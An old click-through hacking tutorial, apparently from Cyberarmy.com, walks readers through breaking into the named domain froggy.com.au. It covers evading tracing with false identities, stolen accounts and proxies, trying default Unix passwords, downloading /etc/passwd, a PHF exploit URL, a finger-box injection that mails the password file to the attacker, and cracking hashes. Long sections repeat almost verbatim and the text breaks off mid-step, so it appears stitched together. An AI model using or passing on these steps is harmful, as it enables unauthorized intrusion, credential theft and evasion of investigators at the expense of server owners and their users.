3. Still using stealth features, Traceroute froggy.com.au . This Traceroute search is avaliable from the Hacker's Home Page, in the Net Tools section.
This will tell you the upstream provider of the victim server.
TOOLS
[Ok, what next?]
WHOIS:
3. Still using stealth features, Whois the site. This Whois search is avaliable from the Hacker's Home Page, in the Net Tools section.
This will give you information on the owners and servers that run the site. Write it down.
TOOLS
[Ok, what next?]
GIVE 'EM THE FINGER:
4. Finger the site. Use this finger service at Cyberarmy.Com to check the site. Try fingering just with “finger @froggy.com.au ” first. This sometimes tells you the names of all accounts. If this does not work, try fingering any email addresses you found on the site, and through Whois. This will sometimes give you useful information.
FINGER @
[Ok, what next?]
THE DEADLY PORT SCAN:
5. Now, we're about to get rough on the site. Port Scan the site.
Port scanning checks for all open ports for an IP. It is extremely useful, however, it practially screams to the webmaster's of the victim site that they are in the middle of being hacked. The is basically no legitimate reason to port scan a site unless you are about to hack it.
There are no very good ways to hide a port scan, but there are a few semi-stealthy port scanners. Most are only for Linux / Unix systems. However, the Exploit Generator for Windows is one that claims to be stealthy. However, if you are trying to enter a very secure site, perhaps forget about port scanning for now, unless you are running Linux.
Though, port scan will tell you all the services a site is running. If port 21 is open, it means they have an FTP server. If port 23 is open, it means they have telnet.
[Ok, What next?]
TELNETTING:
5. The aim of telnetting to the site is basically to try and find out the server type. While your browser is in stealth mode, use the Anonymous Telnet applet in the Cyberarmy.Com to open a Telnet window.
Telnet to the site to Port 23. Usually, if the address is “www.froggy.com.au ”, try telnetting to "froggy.com.au ". If this does not work, try to telnet to telnet.froggy.com.au or try telnetting to any of the sites listed as name servers in your previous Whois search. Once you have got access, note any information it gives you, such as server type.
[This worked - I got the server type!]
[None of that worked...]
TELNETTING:
Now change the telnet to port 21. This should send you straight in to the server's FTP port. If this works, try typing SYST to find out what server type it is.
[This worked - I got the server type!]
[None of that worked...]
TELNETTING:
Now, if you are lucky, try telnetting to port 80, the HTTP port. Note if this gives you any information.
[This worked - I got the server type!]
[None of that worked...]
RUNNING LAME PROGRAMS:
You *need* to know the server type to have any hope of hacking the thing. How do you expect to run exploits against it if you cant even figure out what you're dealing with here?
A final resort is to run a program called Whats Running? It doesn't work very well, but will sometimes tell you the server type. It will also probably be logged by the victim server.
If that doesn't work, do anything to find the server type. Even write them an e-mail asking what operating system they're running.
[Ok, I've got the Info... Now I want access!]
HACKING THROUGH THE PASSWORD:
We will now try to go through the front door of the server. As to our analogy, we are trying to find the combination of the safe.
[Ok, I Want Root!]
[Nah, I already know this server will need exploits]
EASY THINGS FIRST:
You would kick yourselves if ya spent weeks trying advanced hacking with exploits, IP spoofing and social
engineering, just to find that we could have got in by using:
$Login: root
$Password: root
So, let’s just try this first and get it out of the way. Unix comes set up with some default passwords, and
sometimes these are not changed. So, we telnet to froggy.com.au .
Don’t use your usual telnet program. Unless you are using a filched or anonymous account, it will show
your IP address to froggy.com.au . With your proxies changed, and everything set for stealth, switch back to the Anonymous Telnet window.
Then try the following accounts and passwords:
ACCOUNT: PASSWORD
(login) root: (password)root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon
The accounts root, mountfsys, umountfsys, install, and sometimes sync are root level accounts, meaning they have sysop power, or total power. Other logins are just "user level" logins meaning they only have power
over what files/processes they own.
[Nup... Didn't think it would work]
[Incredible... That Lame Trick Actually Worked!]
USING THE LOGIN NAMES:
Still simple things first. About 1 in 20 people are stupid enough to have the same login name and password. With your list of all the email addresses or finger information you dug from the site, try this.
For example, if the web site made a reference to fred@froggy.com.au , try logging in (through telnet or a FTP
program to their server) as:
$Login: Fred
$Password: Fred
Do this with all the names you have found - you might get lucky.
Did this work?
[Nah, they had some baddass security, didn't work]
[Oh, Golly Gee... I got access to one of the accounts!]
GETTING THE PASSWD FILE:
You probably had no luck until now. Actually, most hacking techniques only have a slim chance of success. You just try hundreds of slim chances till you get it.
Assuming you were trying to log in on a Unix system, you may have been wondering how Unix checks to see whether the passwords you gave were correct or not. There is a file called ‘passwd’ on each Unix system which has all the passwords for each user. So, if we can’t guess the passwords, we will now try to rip this file and decrypt it.
[Make it so, Number 1]
ANCIENT CHINESE FTP METHOD:
Your browser should be set to use the fake proxies. We will keep using this browser to FTP, because it cannot be easily traced, whereas something like CuteFTP can be traced to you because it can't use proxies. If in your port scan, you found an opne port 21, its a pretty good indication that they run an FTP server.
Using your stealth browser, try to FTP to froggy.com.au . Example: ftp://froggy.com.au
If that does not work, try to FTP to ftp.froggy.com.au . Example: ftp://ftp.froggy.com.au
If that does not work, try to FTP to the Domain Name Servers listed when you did your WHOIS search. Example: ftp://ns1.froggy.com.au
[Ok, I'm In]
[Nah, stupid thing won't let me in]
ANCIENT CHINESE FTP METHOD:
Now you are connected to froggy.com.au ’s FTP server, click on their \etc directory.
You should see a file called ‘passwd’ and maybe a file called ‘group’. Download the ‘passwd’ file, and
look at it.
If it looks like this when you open it, you are in luck:
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
[etc.]
For example, we know a login is “kangaroo” and their encrypted password is “3A62i9qr”. Note - this is not their password, but an encrypted form of their password.
Or, did it look more like this:
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
Is the second, encrypted password, section replaced by *’s or x’s? This is bad – it is called a shadowed
password and cannot be decrypted. This is how most passwd files are now days. However, if you got a
passwd file which has some non-shadowed entries, you can put your hand to decrypting it.
[Nah, It was all shadowed]
[Nah, couldn't find the passwd file in the first place]
[Yes! I think I got some non-shadowed passwords]
DECRYPTING PASSWD FILES:
There are a few programs around which were written to decrypt Unix passwd files. The most famous one was called ‘Cracker Jack’. Many ‘hacking’ texts strongly recommend this file – but they are mostly talking rubbish. Its old and most systems will just crash when they try to run it, as it uses weird memory allocation.
The best Unix cracker around is currently called 'John the Ripper 1.5’. It is readily avaliable. It was only written in the last year or so, and is a lot faster than Cracker Jack ever was. John the Ripper was also designed with Pentiums in mind, and the brute force techique used is genius. But you have to go down to DOS to use it.
You will also need a large ‘wordfile’, with every English word. Bigger the better. The Crack Programs test every word in the wordfile against the passwd file. If the wordfile is big enough, you have a good chance of getting a password.
[Yes! I Got Me Some Decrypted Passwords!]
[Nah, the Encryption was too Good]
[Give me some reading about all the different password crackers, where to find them, etc.]
THE OLD-STYLE PHF TECHNIQUE:
Although most servers have now trashed a program called PHF, let's just make sure... It is is working, it lets you get the passwd file remotely, even if it is inside hidden and root access only directories.
In the Overlord Anonymizer, type:
http://www.froggy.com.au /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd.
OVERLORD ANONYMIZER
If PHF is active (often not), this string will print out the etc/passwd file strait to your web browser all you need to do is save it as a file and again run a crack program against it.
Now, if you see the words 'Smile! You're on Candid Camera!', it means that the server is protected against this hack, and has logged your IP. But don't worry. So long as you were using the anonymizer, you are safe.
[Nah, they fixed that PHF Bug Problem]
[Yes! I Got Me Some Encrypted Passwords!]
FINGER BOX HACKING:
Finger servers are hacker's friends. Let's find out whether www.froggy.com.au has a finger server.
In the Anonymizer, assuming that the server's name starts with www, type www.froggy.com.au /cgi-bin/finger
OVERLORD ANONYMIZER
If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have another chance to receive the etc/passwd file.
Okay, 1/ get your list of e-mail addresses you found for the site (let's pretend one of them is "kangaroo@froggy.com.au ", and that your email address is "your@email.org")
2/ Go back to the finger box, and type this in (changing these email addresses for the real ones):
kangaroo@froggy.com.au ; /bin/mail your@email.org < etc/passwd
This takes the passwd file through kangaroo@froggy.com.au and emails it to your email address. If this works you now have the etc/passwd file in your mailbox.... you can now run a crack program against it and have a little fun on their box.
[Nah, it didn't work]
[Yes! I Got Me Some Encrypted Passwords!]
LINUX INSTALLATION
All the above really has given you the basic ideas. To do anything firther, and impliment any real exploits, you will have to put a Linux operating system on your computer. Below are some instructions on how to quickly and easily install Linux on your computer. You can just download the files below for free, and install them in a directory on your MS-DOS / Windows system! That's right, you dont even have to repartition your Hard Drive!
Okay... I will make this as basic and free as possible. I will assume you are running Windows 95 or 98 and have never seen Linux before. You have a Hard Drive with at least 100MB free. Youve got a floppy drive, etc. You know how to unzip files. And you dont want to spend any money. Luckily, Linux is free and easy to set up.
1/ Download this file (Australia). It's big, like 34MB. But it's all you need. If the site there is overloaded, get it here .
2/ What you have is a version of Slackware Linux, called zipslack. It's a very simple version of Slackware Linux to set up. I don't use Slackware, and there are some better versions around now - like RedHat 5.2. But, it is a good stable version - and, like I say, very simple to download and setup. Good for a Linux test drive.
3/ Ok, make a directory called 'Linux' on your Hard Drive. That's right, with this distro, you dont even have to repartition your drive. It can be on the same Hard Drive you have Windows on! (I told you this would be easy). Just make sure its a major directory on your hard drive, like c:\linux - not in a subdirectory anywhere.
4/ Now, just unzip all the contents of the zipslack.zip into the right directories, like c:\linux\etc, c:\linux\usr, etc.
5/ Now, heres the hardest part. You will have to edit the \linux\linux.bat file. Open it in an editor.
6/ You'll need to edit the LINUX.BAT file, and make sure the root=/dev/XXXX points to your Hard Drive. If you have put it on your main hard drive, you can make the line:
\linux\loadlin \linux\vmlinuz root=/dev/hda1 (hda1 means the IDE1 Master HDD)
I have Linux on my drive D: (the IDE2 Master HDD), and for me the line would be:
\linux\loadlin \linux\vmlinuz root=/dev/hdc1
7/ If you are unsure, the Linux.bat file has a long list of examples. Just guess. If you get it wrong, you'll still be able to use scrollback (right shift key and PageUp) when the kernel halts to go back and look at your partitions, noting the names Linux gives them. With this information, you should be able to edit the LINUX.BAT correctly.
8/ Well, I skipped ahead of myself. You are now (already) ready to boot up your Linux system. Who said it was hard?
9/ Ok, you must go 'Shut Down' and 'Restart in MS-DOS Mode'. Then just go to the \Linux directory ('cd linux') and run Linux.bat
10/ The Linux system will load itself over MS-DOS (though you don't need to load it over DOS - later you can make a boot-disk so only linux loads).
11/ You will see a whole lot of stuff loading. Then you will see a login: prompt.
12/ You have an operating system just like all the big net servers have!
13/ Okay, just type in 'root', and you have root access on the system. You will want to give yourself a password, so type 'passwd'. Choose something you will remember. Without it, you cannot log in.
14/ Now you will have a black screen with a # looking at you. Dont let that worry you - its just like a MS-DOS screen. A few commands for now: 'ls' (like 'dir' in MS-DOS), 'cd' (change directory, like dos), 'pico' (an editor, use like 'pico text.txt'), and 'mc' (this is a nice menu program that comes with zipslack).
15/ Now, type 'setup'.
16/ Setup your mouse, network settings, screen stuff. Really easy. Just like - 'are you using a 2 button mouse or 3'? Easy.
17/ Now, if you want net access, through this - type 'pppsetup'. This starts the ppp (point to point protocol) setup. You will need to know all your internet settings, like your Gateway, Nameserver numbers, etc. If you dont know these, go back to windows and see what values you used from the Control Panel : Internet section.
18/ Okay. Reboot. Your mouse should be working, with some luck. Hopefully, your modem will be able to dial. Though, often not. If you have a standard external modem on Com 2, it is probably okay. Otherwise, it's sometimes a pain to configure your modem for Linux.
19/ If you are having modem troubles, type 'mc to run the Midnight Commander. Open the 'etc' directory, then 'rc.d', then 'serials.rc'. Comment out the auto config section with '#' signs. And go to the manual config section. Uncomment /dev/cua0 (Com 1:) and /dev/cua1 (Com 2:) - or /dev/cua2 or cua3 (Com 3: or 4:) for internal modem users. Now, from windows, go to Accessories:System Tools:System Information (Win 98) to get the IRQ and Port Settings for your modem. If you are in Win95, I think you have to run something called msd.com in the \windows directory. Put these setting in. Then, edit S.rc and at the bottom, uncomment the place where it says to call the serials.rc file.
20/ If you have a CD-Rom you can also edit S.rc so that it checks for a CD Rom during bootup.
21/ All things going well, you should now have a fully functional Unix type system on your computer. You can download all your latest little X-Crush programs (in .tgz format). To setup Software - say a Linux stealth port scanner, save the .tgz file in a directory and run 'pkgtool'. Then go 'install file'. Real easy. If it is a C program, type 'gcc program.c' to compile it.
22/ Well, you are missing a Windows type interface. You dont need one. But if you want to surf using Linux, etc. It is better to have a graphical interface - although you can run a browser called 'lynx' just through the vanilla Linux interface.
23/ You can get some things, like X-Windows from ftp.cdrom.com/pub/linux/slackware/slakware/x1/
24/ Just get all the files that look vital (about 8 of them), and run pkgtool to install them all. You will probably find that setting up X-Win for the first time is a huge pain. It was for me at least - you need to know, for example, the horizontal and vertical refresh rates of your monitor. Then, get something like the Linux Netscape, or Arena as a browser. These run thru X-Windows.
25/ You will have fun tweaking everything as you like it. There are dozens of windows interfaces to choose from. Some looks almost identical to Win95.
26/ Where from here? You can now do practically anything - you basically have all the net power your ISP does, except for all the phone lines. You can let people use you as a dial up ISP, you can host web pages and set up FTP sites to run from your computer. You can set up email addresses, nameservers... anything.
27/ Because Linux is the same software as most ISPs run, a lot of hackers use Linux. You will be able to issue commands to other servers. You can ask other servers about themselves. For example, type 'showmount -e victim.com'. You can also run things like 'ping', and 'traceroute' directly from your command line. You can send mail from your own sendmail program so that it is untraceable.
Some last incentives, if you were brought up in the Windows world and are afraid of command prompts, just type 'mc'. The zipslack distro comes with this 'Midnight Commander' - which I use a lot. And play a few games on the things. There are a few old favourites installed by default - like 'trek', and 'adventure', etc. If you were in computers 20 years ago, you will know what I mean. The games directory is in usr/games.
If you have got any more problems, there are a lot of people on the IRC #Linux channel on undernet who are very helpful. If your Linux is set up to the net, you can run the Linux Bitch-X IRC program to get there. Zipslack also has pine (for email), tin (for newsgroups), and lynx (for surfing).
Fact is, when you got this all working for a few weeks (and probably loving it), you will no doubt like to try some more advanced Linux distros. Although there are a lot of personal feelings about various distributions, I recommend RedHat 5.2 Linux. You will find it very easy to install.
If you are happy buying through Amazon.Com, here is the best Linux deal I've been able to find anywhere. It deals with the 3 major Linux distributions: Red Hat, Slackware, and Debian - with 3 CDs. It also contains a very good install guide. All for about half the price of the single 'official' RedHat CD. If you like this Linux stuff, I recommend you get it - or at least make sure you get a book that is written very recently.[an error occurred while processing this directive]
[Nah, it didn't work]
[Yes! I Got Me Some Encrypted Passwords!]
CURRENT LIMIT:
You have reached the current limit of the tutorials.... I will add further steps when I get the time and if people like these lessons. Also, if people want to write sections up for this, just mail the sections to me, to the e-mail address listed at Cyberarmy.Com.
Until this gets bigger, I can suggest a few books that teach hacking. I've found that a lot of books are rubbish and just teach how to change screen colours, but there are a few that every hacker should have in their library.
THE ESSENTIAL HACKER'S LIBRARY:
ESSENTIAL BOOKS:
1. MAXIMUM SECURITY: Of course, Maximum Security has to be at number one. I guess this would probably be the central book in any hacker's library. Goes through a heap of techniques like a textbook with over 900 pages.
2. THE HAPPY HACKER: Essential for newbies. Although this book is bagged a lot by people who hate Carolyn, I think most people agree it would be the perfect first book a newbie should read. Explains things pretty well, spelling mistakes, but probably an essential newbie primer. Thou, as I say, if you know your stuff you can safely forget this one.
ESSENTIAL SOFTWARE:
1. LINUX: You will need to change to Linux to do any serious hacking. But thankfully, it is fairly simple and you can just set up Linux in a seperate partition on your Hard Drive and set for a dual boot option: usually windows, and when you are hacking, Linux. You amount of 'Net Power' increases 500%. If you want to buy Linux, make sure you get the latest version not an obsolete one. There are also several different 'flavours' of Linux, you will probably want to start with RedHat, then possibly move to Slackware after a year or so. So, make sure you get a deal which gives you the oportunity to check out some of the different distributions. By far the best Linux deal I've found around is this one . It has an excellent Linux manual, and comes with three seperate Linux distributions on 3 CDs, including the very latest RedHat and Slackware. It's also excellent value (about half the price of buying the single 'official' RedHat CD).
NOT ESSENTIAL, BUT RECOMMENDED BOOKS:
(These books are mainly just part of the Hacker Culture)
3. THE WATCHMAN: The Twisted Life and Crimes of Serial Hacker Kevin Poulsen: This one will not teach you anything, so stuff it if you just want to learn. Although it was one of the best reads I ever had. More like a thriller book, but it was real! The Kevin Mitnick books are about the same, but this one deals a lot with phreaking, and scamming radio stations of cars. But, as I say, it doesn't go through any techniques, so stuff it if you just want to learn stuff.
4. THE FUGITIVE GAME: Online With Kevin Mitnick: Again, a really fun read (though, I prefer the Poulsen book) but it doesn't go through any hacking techniques. But I have to list it here because it is such a good read. It's also a really cheap buy.
5. TAKEDOWN : The Pursuit and Capture of Kevin Mitnick: This is the other side of the Mitnick story (written by the cops who chased him). Interesting, but the essential Mitnick book is the one above. Though, this is a very good primer on how the FBI operates to capture hackers. But, again, no techniqes listed. For techniques, you would only have luck in the first two books listed.
Okay, as for programming books - stuff it. You can download the things for free if you search for "perl + programming + tutorial" and things like that. Unless you like printed books, forget that. So, the only other thing is Linux. You will need to have Linux as a dual boot option on your PC if you want to do any serious hacking.
Some books that suck: these are some books that are going around that are a rip-off. SECRETS OF A SUPER HACKER: This is another book that a lot of people have. The book seemed like a real waste of time to me.
So, keep going through this tutorial as it gets bigger, read anything you find on the web. Get some of the major books above, at least 1 and 2, and read them very carefully - four or five times. Join your local Linux users group, if you have one. And, later on, download a few guides on programming and read through them when you get some time. With some effort (it isn't easy), you can become a respected hacker and take control of the Net.
[Back to Index]
CONGRATULATIONS:
You have gained access.
If you now have the login code and password, you may use the users mail account, FTP priviliges (change their web pages by uploading new ones), and HTTP access.
(If you have only got access to a user level account, do not despair. If you have a user level account, it is easy to use that to later get a root level account. More on this when this study is made bigger).
[I Want to Go Straight to Hacking]
INTRODUCTION:
A little background is needed before we get into hacking techniques.
When we talk about ‘Hacking’, we are talking about getting some access on a server we shouldn’t have. Servers are set up so that many people can use them. These people each have different ‘accounts’ on the server – like different directories that belong just to them. If Fred has an account with the froggy.com.au ISP (Internet Service Provider), he will be given:
(1) a login name, which is like the name of your directory; and
(2) a password, which lets you get access to that directory.
This login name and password will usually give you access to all of Fred’s services - his mail, news services and web pages. There is also the ‘root’ account, which has it’s own login and password. This gives super-user access to the entire server. We will focus on ‘getting root’, in this help file.
[Ok, I want to move to the 'anatomy of the hack']
[I know all this, let me move straight to hacking]
[
I don't have a clue what you're on about, let me read some backgroundon this so called "Internet" you keep referring to
THE ANATOMY OF THE 'HACK':
There are two main ways to break into a system. Think of a server as a Swiss Bank Vault. There are two main ways to get in. You can try to get in by finding the combination of the vault. This is like finding the password. It’s how you are meant to get in. The second way is by using dynamite. You forget all about the ‘proper’ way to get in. This is like using ‘exploits’, or weaknesses in the servers operating system to gain access.
[Ok, Let's Go. Tell Me About Not Getting Caught]
[Stuff it, I know how to not get caught, on to the techniques!]
'DON'T GET CAUGHT':
Hacking is illegal, and it is very easy to trace you if froggy.com.au realizes you hacked them. Wherever you go,
your IP number (your computer’s unique identification) is left and often logged. Solutions:
1. When you set up your account with an ISP, give a false name and address.
[Nah, I can't be bothered, what other things can I do?]
[Ok, I used this trick. What else can I do?]
[Stuff it, I know how to not get caught, on to the techniques!]
'DON'T GET CAUGHT':
2. Hack using a filched account (stolen password, etc.). A tool called Dripper
[Nah, just tell me something easy I can do right now]
[Ok, done. Anything else I should do?]
'DON'T GET CAUGHT':
3. Port your connection through something else.
An easy way to do this is to change your proxy settings. By using the proxy settings meant for a different ISP, it can look like you are surfing from wherever that ISP is. A list of proxies you can use is here
You should also do any important info gathering through the IP Jamming Applet on the Cyberarmy.Com
If you want super anonymity, you should be surfing in an account you set up under a false name, with your proxy settings changed, and also surfing through the IP Jamming applet! Be aware that some ISPs could use Caller ID to test the number of someone logging on. Dial the relevant code to disable Caller ID before calling your ISP.
[I don't understand about the proxy settings thing, let me read more
[Ok, I am wired for hyper stealth... Now, I want to HACK!]
INFO GATHERING:
To start off, you will probably need to gather information about www.froggy.com.au using internet tools.
[Ok, how?]
[Give me some reading to do about info gathering
[No, I've already got all the info, just tell me what to do]
DIRT DIGGING STAGE:
We are now taking the first steps of any hack... Info Gathering.
You should be set up for stealth mode. Get a notepad, and open a new browser window (through the IP Jammer). Bring the www.froggy.com.au 's web page up in the IP Jammer's window. You can load the IP Jamming applet on the Cyberarmy.Com
[Ok, What Now?]
CASE THE JOINT:
1. First, check out the site. Take down any email addresses, copy down the HTML of important pages.
[Done... What Else?]
THE OLD BOUNCING MAIL TRICK:
2. Send a mail that will bounce to the site. If the site is www.froggy.com.au , send a mail to blahblahblah@froggy.com.au . It will bounce back to you and give you information in its header.
Copy the information from the headers down.
(To maintain anonymity, it might be a good idea to send and receive the mail from a free web based provider, such as hotmail.com. Use full stealth features when sending the bouncing mail. This will protect you when they check through the logs after they are hacked.)
[Done... What Else?]
TRACEROUTE:
3. Still using stealth features, Traceroute froggy.com.au . This Traceroute search is avaliable from the Hacker's Home Page, in the Net Tools section.
This will tell you the upstream provider of the victim server.
TOOLS
[Ok, what next?]
WHOIS:
3. Still using stealth features, Whois the site. This Whois search is avaliable from the Hacker's Home Page, in the Net Tools section.
This will give you information on the owners and servers that run the site. Write it down.
TOOLS
[Ok, what next?]
GIVE 'EM THE FINGER:
4. Finger the site. Use this finger service at Cyberarmy.Com to check the site. Try fingering just with “finger @froggy.com.au ” first. This sometimes tells you the names of all accounts. If this does not work, try fingering any email addresses you found on the site, and through Whois. This will sometimes give you useful information.
FINGER @
[Ok, what next?]
THE DEADLY PORT SCAN:
5. Now, we're about to get rough on the site. Port Scan the site.
Port scanning checks for all open ports for an IP. It is extremely useful, however, it practially screams to the webmaster's of the victim site that they are in the middle of being hacked. The is basically no legitimate reason to port scan a site unless you are about to hack it.
There are no very good ways to hide a port scan, but there are a few semi-stealthy port scanners. Most are only for Linux / Unix systems. However, the Exploit Generator for Windows is one that claims to be stealthy. However, if you are trying to enter a very secure site, perhaps forget about port scanning for now, unless you are running Linux.
Though, port scan will tell you all the services a site is running. If port 21 is open, it means they have an FTP server. If port 23 is open, it means they have telnet.
[Ok, What next?]
TELNETTING:
5. The aim of telnetting to the site is basically to try and find out the server type. While your browser is in stealth mode, use the Anonymous Telnet applet in the Cyberarmy.Com
Telnet to the site to Port 23. Usually, if the address is “www.froggy.com.au ”, try telnetting to "froggy.com.au ". If this does not work, try to telnet to telnet.froggy.com.au or try telnetting to any of the sites listed as name servers in your previous Whois search. Once you have got access, note any information it gives you, such as server type.
[This worked - I got the server type!]
[None of that worked...]
TELNETTING:
Now change the telnet to port 21. This should send you straight in to the server's FTP port. If this works, try typing SYST to find out what server type it is.
[This worked - I got the server type!]
[None of that worked...]
TELNETTING:
Now, if you are lucky, try telnetting to port 80, the HTTP port. Note if this gives you any information.
[This worked - I got the server type!]
[None of that worked...]
RUNNING LAME PROGRAMS:
You *need* to know the server type to have any hope of hacking the thing. How do you expect to run exploits against it if you cant even figure out what you're dealing with here?
A final resort is to run a program called Whats Running? It doesn't work very well, but will sometimes tell you the server type. It will also probably be logged by the victim server.
If that doesn't work, do anything to find the server type. Even write them an e-mail asking what operating system they're running.
[Ok, I've got the Info... Now I want access!]
HACKING THROUGH THE PASSWORD:
We will now try to go through the front door of the server. As to our analogy, we are trying to find the combination of the safe.
[Ok, I Want Root!]
[Nah, I already know this server will need exploits]
EASY THINGS FIRST:
You would kick yourselves if ya spent weeks trying advanced hacking with exploits, IP spoofing and social
engineering, just to find that we could have got in by using:
$Login: root
$Password: root
So, let’s just try this first and get it out of the way. Unix comes set up with some default passwords, and
sometimes these are not changed. So, we telnet to froggy.com.au .
Don’t use your usual telnet program. Unless you are using a filched or anonymous account, it will show
your IP address to froggy.com.au . With your proxies changed, and everything set for stealth, switch back to the Anonymous Telnet window.
Then try the following accounts and passwords:
ACCOUNT: PASSWORD
(login) root: (password)root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon
The accounts root, mountfsys, umountfsys, install, and sometimes sync are root level accounts, meaning they have sysop power, or total power. Other logins are just "user level" logins meaning they only have power
over what files/processes they own.
[Nup... Didn't think it would work]
[Incredible... That Lame Trick Actually Worked!]
USING THE LOGIN NAMES:
Still simple things first. About 1 in 20 people are stupid enough to have the same login name and password. With your list of all the email addresses or finger information you dug from the site, try this.
For example, if the web site made a reference to fred@froggy.com.au , try logging in (through telnet or a FTP
program to their server) as:
$Login: Fred
$Password: Fred
Do this with all the names you have found - you might get lucky.
Did this work?
[Nah, they had some baddass security, didn't work]
[Oh, Golly Gee... I got access to one of the accounts!]
GETTING THE PASSWD FILE:
You probably had no luck until now. Actually, most hacking techniques only have a slim chance of success. You just try hundreds of slim chances till you get it.
Assuming you were trying to log in on a Unix system, you may have been wondering how Unix checks to see whether the passwords you gave were correct or not. There is a file called ‘passwd’ on each Unix system which has all the passwords for each user. So, if we can’t guess the passwords, we will now try to rip this file and decrypt it.
[Make it so, Number 1]
ANCIENT CHINESE FTP METHOD:
Your browser should be set to use the fake proxies. We will keep using this browser to FTP, because it cannot be easily traced, whereas something like CuteFTP can be traced to you because it can't use proxies. If in your port scan, you found an opne port 21, its a pretty good indication that they run an FTP server.
Using your stealth browser, try to FTP to froggy.com.au . Example: ftp://froggy.com.au
If that does not work, try to FTP to ftp.froggy.com.au . Example: ftp://ftp.froggy.com.au
If that does not work, try to FTP to the Domain Name Servers listed when you did your WHOIS search. Example: ftp://ns1.froggy.com.au
[Ok, I'm In]
[Nah, stupid thing won't let me in]
ANCIENT CHINESE FTP METHOD:
Now you are connected to froggy.com.au ’s FTP server, click on their \etc directory.
You should see a file called ‘passwd’ and maybe a file called ‘group’. Download the ‘passwd’ file, and
look at it.
If it looks like this when you open it, you are in luck:
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
[etc.]
For example, we know a login is “kangaroo” and their encrypted password is “3A62i9qr”. Note - this is not their password, but an encrypted form of their password.
Or, did it look more like this:
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
Is the second, encrypted password, section replaced by *’s or x’s? This is bad – it is called a shadowed
password and cannot be decrypted. This is how most passwd files are now days. However, if you got a
passwd file which has some non-shadowed entries, you can put your hand to decrypting it.
[Nah, It was all shadowed]
[Nah, couldn't find the passwd file in the first place]
[Yes! I think I got some non-shadowed passwords]
DECRYPTING PASSWD FILES:
There are a few programs around which were written to decrypt Unix passwd files. The most famous one was called ‘Cracker Jack’. Many ‘hacking’ texts strongly recommend this file – but they are mostly talking rubbish. Its old and most systems will just crash when they try to run it, as it uses weird memory allocation.
The best Unix cracker around is currently called 'John the Ripper 1.5’. It is readily avaliable. It was only written in the last year or so, and is a lot faster than Cracker Jack ever was. John the Ripper was also designed with Pentiums in mind, and the brute force techique used is genius. But you have to go down to DOS to use it.
You will also need a large ‘wordfile’, with every English word. Bigger the better. The Crack Programs test every word in the wordfile against the passwd file. If the wordfile is big enough, you have a good chance of getting a password.
[Yes! I Got Me Some Decrypted Passwords!]
[Nah, the Encryption was too Good]
[Give me some reading about all the different password crackers, where to find them, etc.
THE OLD-STYLE PHF TECHNIQUE:
Although most servers have now trashed a program called PHF, let's just make sure... It is is working, it lets you get the passwd file remotely, even if it is inside hidden and root access only directories.
In the Overlord Anonymizer, type:
http://www.froggy.com.au /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd.
OVERLORD ANONYMIZER
If PHF is active (often not), this string will print out the etc/passwd file strait to your web browser all you need to do is save it as a file and again run a crack program against it.
Now, if you see the words 'Smile! You're on Candid Camera!', it means that the server is protected against this hack, and has logged your IP. But don't worry. So long as you were using the anonymizer, you are safe.
[Nah, they fixed that PHF Bug Problem]
[Yes! I Got Me Some Encrypted Passwords!]
FINGER BOX HACKING:
Finger servers are hacker's friends. Let's find out whether www.froggy.com.au has a finger server.
In the Anonymizer, assuming that the server's name starts with www, type www.froggy.com.au /cgi-bin/finger
OVERLORD ANONYMIZER
If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have another chance to receive the etc/passwd file.
Okay, 1/ get your list of e-mail addresses you found for the site (let's pretend one of them is "kangaroo@froggy.com.au ", and that your email address is "your@email.org")
2/ Go back to the finger box, and type this in (changing these email addresses for the real ones):
kangaroo@froggy.com.au ; /bin/mail your@email.org < etc/passwd
This takes the passwd file through kangaroo@froggy.com.au and emails it to your email address. If this works you now have the etc/passwd file in your mailbox.... you can now run a crack program against it and have a little fun on their box.
[Nah, it didn't work]
[Yes! I Got Me Some Encrypted Passwords!]
LINUX INSTALLATION
All the above really has given you the basic ideas. To do anything firther, and impliment any real exploits, you will have to put a Linux operating system on your computer. Below are some instructions on how to quickly and easily install Linux on your computer. You can just download the files below for free, and install them in a directory on your MS-DOS / Windows system! That's right, you dont even have to repartition your Hard Drive!
Okay... I will make this as basic and free as possible. I will assume you are running Windows 95 or 98 and have never seen Linux before. You have a Hard Drive with at least 100MB free. Youve got a floppy drive, etc. You know how to unzip files. And you dont want to spend any money. Luckily, Linux is free and easy to set up.
1/ Download this file
2/ What you have is a version of Slackware Linux, called zipslack. It's a very simple version of Slackware Linux to set up. I don't use Slackware, and there are some better versions around now - like RedHat 5.2. But, it is a good stable version - and, like I say, very simple to download and setup. Good for a Linux test drive.
3/ Ok, make a directory called 'Linux' on your Hard Drive. That's right, with this distro, you dont even have to repartition your drive. It can be on the same Hard Drive you have Windows on! (I told you this would be easy). Just make sure its a major directory on your hard drive, like c:\linux - not in a subdirectory anywhere.
4/ Now, just unzip all the contents of the zipslack.zip into the right directories, like c:\linux\etc, c:\linux\usr, etc.
5/ Now, heres the hardest part. You will have to edit the \linux\linux.bat file. Open it in an editor.
6/ You'll need to edit the LINUX.BAT file, and make sure the root=/dev/XXXX points to your Hard Drive. If you have put it on your main hard drive, you can make the line:
